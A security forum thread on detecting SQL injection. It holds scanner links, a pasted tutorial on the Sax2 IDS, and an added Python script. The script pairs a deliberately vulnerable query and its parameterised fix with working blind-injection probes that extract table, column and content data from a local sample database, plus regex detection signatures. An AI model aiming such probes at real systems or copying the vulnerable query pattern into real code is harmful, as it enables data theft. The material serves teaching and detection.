
How to Detect SQL Injection Attacks


2 replies to this topic

#1 JackCheng

JackCheng

  • Members
  • 8 posts
  • OFFLINE
  • Gender:Male
  • Local time:09:51 AM

Posted 23 February 2010 - 03:09 AM

My server encountered SQL Injection Attacks. Please, somebody, recommend an intrusion detection tool. Thanks in advance!


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 50,961 posts
  • OFFLINE
  • Gender:Male
  • Location:Virginia, USA
  • Local time:10:51 AM

Posted 23 February 2010 - 03:13 PM

Using Database Caches to Detect SQL injection - To Cache a Thief
How to detect and stop SQL injection attacks
SQL Inject-Me to test for SQL Injection vulnerabilities - SQL Inject-Me FAQs

Finding SQL Injection with HP Scrawlr

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities...

Download HP Scrawlr

Free Edition of Acunetix Web Vulnerability Scanner
Online Tools: SQL Injection Vulnerability Test

Edit: Fixed link

Edited by quietman7, 23 February 2010 - 03:38 PM.

Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#3 JackCheng

JackCheng
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  • Gender:Male
  • Local time:09:51 AM

Posted 07 March 2015 - 06:19 AM

I found a great tutorial, please see the text below:

What are SQL Injection Attacks?

With the growth of B/S model application development, more and more programmers write programs with it. Unfortunately, many programmers do not check the validity of users' input data while coding, and so there will be security risks in the application.

Malicious attackers submit a specially crafted section of database query code to the server, and the server discloses sensitive information when it responds with the corresponding result. This is an SQL Injection Attack. Most current firewalls will not raise an alarm when there is an SQL injection attack, because the injection arrives through a normal entry point, is hidden and difficult to detect, and looks like a normal website visit.

The danger of SQL Injection Attacks

According to CVE statistics for 2006, more than 70% of attacks were based on web applications. SQL Injection Attacks increase year by year, reaching 1078 in 2006. Even so, these figures only cover vulnerabilities in general-purpose applications.

[Figure: CVE SQL injection vulnerabilities by year]

The dangers of SQL Injection Attacks include:

  • Changing the data in the database without authorization.
  • Gaining administrative authority over a site without authorization.
  • Maliciously changing the content of a site without authorization.
  • XSS attacks.
  • Gaining control of the server without authorization.
  • Adding, deleting and changing the accounts on the server without authorization.

The process of detecting and reverting SQL Injection Attacks with Sax2

Some IDS software can effectively detect SQL Injection Attacks, though a firewall cannot. Now we go through the process of detecting and reverting SQL Injection Attacks with the IDS software Sax2.

The steps of an SQL Injection Attack are:

a) Determine the environment to find the injection point.
b) Determine the type of database.
c) Guess the table (datasheet).
d) Guess the field.
e) Guess the content.

The steps "Guess the table", "Guess the field" and "Guess the content" are the most important in the whole SQL Injection Attack process. Let's analyze these three steps.

Sax2 detects and raises alarms on attacks in the network in real time. When there is an SQL Injection Attack it is shown in the Event table; see Figure 1.

[Figure 1: Sax2 alarms on the MS_SQL Injection Attack in real time]

The selected event in Figure 1 shows the attacker's IP 192.168.21.103 and the victim's IP 125.65.112.10. The original message, shown in the Original Communication view, is "select * from [dirs]", which asks whether there is a table named "dirs" in the current database.
The attacker repeats this operation to find the expected table. Once the corresponding table is found in the database, he will try to guess the fields in the table.

[Figure 2: Sax2 analysis shows the attacker guessing the field in the admin database]

The code in the red circle in Figure 2 shows the attacker guessing the "paths" field in the admin database. Again, the attacker repeats this operation until the corresponding field is found.

After finding the corresponding field, the attacker determines the length of the field and then guesses its content. Once the attacker has successfully guessed the content of the field, the SQL Injection Attack is complete. Sometimes the attacker has to decrypt the content if it is MD5 encrypted.

Above is the whole process of an SQL Injection Attack and how we detect it with Sax2. As we can see, Sax2 can effectively detect and alarm on SQL Injection Attacks when they occur. The IDS software Sax2 is a useful tool against SQL Injection Attacks and, combined with firewall software, improves your network security.
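The tutorial above describes the attack in prose and shows the IDS view in screenshots. The following is an added example, written for this page and not code from the thread, from the tutorial's author or from the Sax2 product. It puts the pieces together in one runnable script: the input-validation flaw the tutorial blames (user input pasted into the SQL text) beside its parameterised fix, the table/field/content guessing steps c) to e) run against the flaw as boolean probes, and a small wire-level classifier that labels each captured query with its attack phase, which is the kind of judgement an IDS such as Sax2 makes. Only the table and column names (dirs, admin, paths) and the two IP addresses come from the tutorial; the schema, sample rows, probe strings and detection regexes are constructed assumptions for the example.

```python
# Added example (not from the thread or from Sax2): vulnerable lookup vs. fix,
# the table/field/content guessing probes, and a wire-level phase classifier.
# Table/column names and IPs come from the tutorial; everything else here is
# a constructed assumption for illustration.
import re
import sqlite3

ATTACKER_IP, VICTIM_IP = "192.168.21.103", "125.65.112.10"
WIRE = []  # constructed capture: (src, dst, sql) tuples an IDS tap would see


def make_db():
    """Constructed sample database: a harmless 'dirs' table and an 'admin' table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE dirs (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO dirs VALUES (1, 'public');
        CREATE TABLE admin (id INTEGER PRIMARY KEY, paths TEXT, pwd_md5 TEXT);
        INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_sql(item_id):
    """The flaw the tutorial describes: user input pasted straight into the SQL."""
    return "SELECT name FROM dirs WHERE id = " + item_id


def lookup_vulnerable(conn, item_id):
    return conn.execute(vulnerable_sql(item_id)).fetchall()


def lookup_safe(conn, item_id):
    """Fix: the value is bound as a parameter, so it can never alter the query shape."""
    return conn.execute("SELECT name FROM dirs WHERE id = ?", (item_id,)).fetchall()


def oracle(conn, payload):
    """Attacker's view of one probe: True (row came back), False (no row) or 'error'.
    The query is also appended to WIRE, which is what the IDS tap observes."""
    WIRE.append((ATTACKER_IP, VICTIM_IP, vulnerable_sql(payload)))
    try:
        return bool(lookup_vulnerable(conn, payload))
    except sqlite3.OperationalError:  # e.g. "no such table": the guess was wrong
        return "error"


def guess_table(conn, table):
    """Step c): does a table with this name exist?"""
    return oracle(conn, f"1 AND (SELECT COUNT(*) FROM {table}) >= 0") is True


def guess_field(conn, table, field):
    """Step d): does the table have this column?"""
    return oracle(conn, f"1 AND (SELECT COUNT({field}) FROM {table}) >= 0") is True


def guess_content(conn, table, field, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Step e): learn the length, then recover the first row's value one character at a time."""
    length = next((n for n in range(1, 64)
                   if oracle(conn, f"1 AND (SELECT LENGTH({field}) FROM {table} LIMIT 1) = {n}") is True), 0)
    value = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if oracle(conn, f"1 AND (SELECT SUBSTR({field}, {pos}, 1) FROM {table} LIMIT 1) = '{ch}'") is True:
                value += ch
                break
    return value


# Detection side. Each pattern is a constructed heuristic for one phase; the most
# specific (content probing) is tested first. These are signatures, so a benign
# "SELECT * FROM x" also matches; summarize() therefore only reports repeat offenders.
PHASES = [
    ("content-guess", re.compile(r"\b(substr|substring|ascii|length|len)\s*\(", re.I)),
    ("field-guess",   re.compile(r"select\s+count\s*\(\s*[\w\[\]]+\s*\)\s+from", re.I)),
    ("table-guess",   re.compile(r"select\s+(\*|count\s*\(\s*\*\s*\))\s+from", re.I)),
]


def classify(sql):
    """Label one query with its attack phase, or None for an unremarkable query."""
    for phase, pattern in PHASES:
        if pattern.search(sql):
            return phase
    return None


def summarize(wire, min_probes=3):
    """Group captured queries by source IP; return {src: {phase: count}} for
    sources that produced at least min_probes suspicious queries."""
    seen = {}
    for src, _dst, sql in wire:
        phase = classify(sql)
        if phase:
            seen.setdefault(src, {}).setdefault(phase, 0)
            seen[src][phase] += 1
    return {src: phases for src, phases in seen.items() if sum(phases.values()) >= min_probes}


if __name__ == "__main__":
    db = make_db()
    print("existing tables:", [t for t in ("users", "admin") if guess_table(db, t)])
    print("field 'paths' in admin:", guess_field(db, "admin", "paths"))
    print("first 'paths' value:", guess_content(db, "admin", "paths"))
    print("safe lookup with same payload:", lookup_safe(db, "1 AND (SELECT COUNT(*) FROM admin) >= 0"))
    for src, phases in summarize(WIRE).items():
        print(f"{src} probed the server: {phases}")
```

Run as a script it prints the table that exists, confirms the "paths" column, recovers the value "admin" character by character through the vulnerable query, shows the parameterised query returning nothing for the same payload, and then reports 192.168.21.103 with counts for each phase. The phase regexes are deliberately simple signatures; the point of summarize() is that, as with the repeated probes the tutorial's screenshots show, it is the volume and progression of guesses from one source, not any single query, that separates an injection attempt from ordinary traffic.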





